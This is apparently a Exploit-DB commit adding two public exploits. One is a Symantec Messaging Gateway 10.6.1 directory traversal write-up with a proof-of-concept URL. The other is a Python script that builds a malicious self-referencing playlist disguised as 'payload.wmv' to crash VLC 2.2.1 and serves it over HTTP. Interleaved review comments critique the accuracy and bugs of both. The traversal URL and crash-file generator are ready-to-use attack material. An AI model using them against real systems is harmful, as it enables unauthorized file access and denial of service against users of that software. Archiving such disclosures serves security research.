DB: 2016-09-29
2 new exploits: Symantec Messaging Gateway 10.6.1 - Directory Traversal; VLC Media Player 2.2.1 - Buffer Overflow
This commit is contained in:
parent
f421077feb
commit
d86bdf5f80
3 changed files with 93 additions and 0 deletions
@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port
38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
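--- a/platforms/java/webapps/40437.txt
+++ b/platforms/java/webapps/40437.txt
@@ -0,0 +1,53 @@
+# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
+# Date : 28/09/2016
+# Author : R-73eN
+# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
+# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
+# Vendor : Symantec
+# CVE : CVE-2016-5312
+# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
+#
+# ___ __ ____ _ _
+# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
+# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
+# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
+# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
+#
+#
+# DESCRIPTION:
+#
+# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
+# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
+# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
+#
+The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
+The vulnerable code is
+extends HttpServlet {
+public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
+block6 : {
+try {
+String string = httpServletRequest.getParameter("sn");
+//**** Taking parameter "sn" and writing it to the "string variable"
+
+
+if (string == null) break block6;
+String string2 = string.substring(string.length() - 3);
+
+byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
+
+//**** The string variable is passed here without any sanitanization for directory traversal
+//**** and you can successfully use this to do a directory traversal.
+
+if (arrby != null) {
+httpServletResponse.setContentType("image/" + string2);
+ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
+httpServletResponse.setContentLength(arrby.length);
+servletOutputStream.write(arrby);
+this.getServletContext().removeAttribute(string);
+break block6;
+}
+
+
+POC:
+https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
+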
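Review bot: The quoted excerpt does not show a filesystem read: `sn` is used only as the key of `this.getServletContext().getAttribute(string)` and the later `removeAttribute(string)`, so on the code shown here the `../../WEB-INF/lib` PoC names a servlet-context attribute rather than a path, and the real traversal sink is presumably elsewhere in the kavachart package; the write-up should quote the code that resolves `sn` against a directory, or a captured response that proves the listing is returned. What the excerpt does establish is that `string.substring(string.length() - 3)` throws `StringIndexOutOfBoundsException` for any `sn` shorter than three characters and that this user-controlled suffix is echoed into `setContentType("image/" + string2)`, both worth a sentence of their own. The DESCRIPTION block says the attacker is an authorized but less privileged control-center user, so the POC should say that a valid session is needed, e.g. `POC (requires an authenticated, non-admin control-center session):`. The `doGet` body is cut off before its closing braces and any catch block, so whether the substring exception is swallowed cannot be judged from this excerpt.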
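--- a/platforms/windows/dos/40439.py
+++ b/platforms/windows/dos/40439.py
@@ -0,0 +1,38 @@
+Exploit Title: VLC Media Player 2.2.1 Buffer Overflow
+2016-09-28
+Author: sultan albalawi
+Software Link: https://www.videolan.org/vlc/releases/2.2.1.html
+Tested on:win7
+video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater¬if_t=video_processed¬if_id=1475012468070044
+
+*************************************************************************************
+filecreate = "payload.wmv" # create file (payload.wmv)
+buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+
+"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+
+"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+
+"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+
+"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+
+"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+
+"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+
+"\x32\x30\x78\x33\x36\x30\r\n")
+buffer += filecreate
+open(filecreate, "wb").write(buffer)
+print "create file done {}".format(filecreate)
+import BaseHTTPServer
+import sys
+from SimpleHTTPServer import SimpleHTTPRequestHandler
+HandlerClass = SimpleHTTPRequestHandler
+ServerClass = BaseHTTPServer.HTTPServer
+Protocol = "HTTP/1.0"
+if sys.argv[1:]:
+    port = int(sys.argv[1])
+else:
+    port =8080
+server_address = ('192.168.100.3',8080)
+HandlerClass.protocol_version = Protocol
+httpd = ServerClass(server_address, HandlerClass)
+sa = httpd.socket.getsockname()
+print sa[0],sa[1],filecreate
+print "open vlc and open file {}".format(filecreate)
+print "LISTENING..",sa[0],sa[1],filecreate
+httpd.serve_forever()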
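Review bot: `server_address = ('192.168.100.3',8080)` hard-codes the author's LAN address and ignores the `port` parsed from `sys.argv` a few lines earlier, so the argument handling is dead code and the bind fails on any host without that address; use `server_address = ('0.0.0.0', port)` or take the host as a second argument. The hex-escaped `buffer` decodes to plain ASCII `#EXTM3U\r\n#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1,RESOLUTION=120x360\r\n` followed by the file's own name, i.e. an HLS master playlist that references itself, which presumably sends VLC's playlist handling into recursion rather than the "buffer overflow" the title claims; write it as a readable literal and attach the crash output showing the faulting frame. `SimpleHTTPRequestHandler` serves the entire working directory to anyone who can reach that address, so run it from an empty directory, and `open(filecreate, "wb").write(buffer)` should be a `with` block so the handle is closed deterministically. As rendered here the header lines from `Exploit Title:` through `video :` carry no `#`, so unless the rendering dropped them the file will not parse as Python at all.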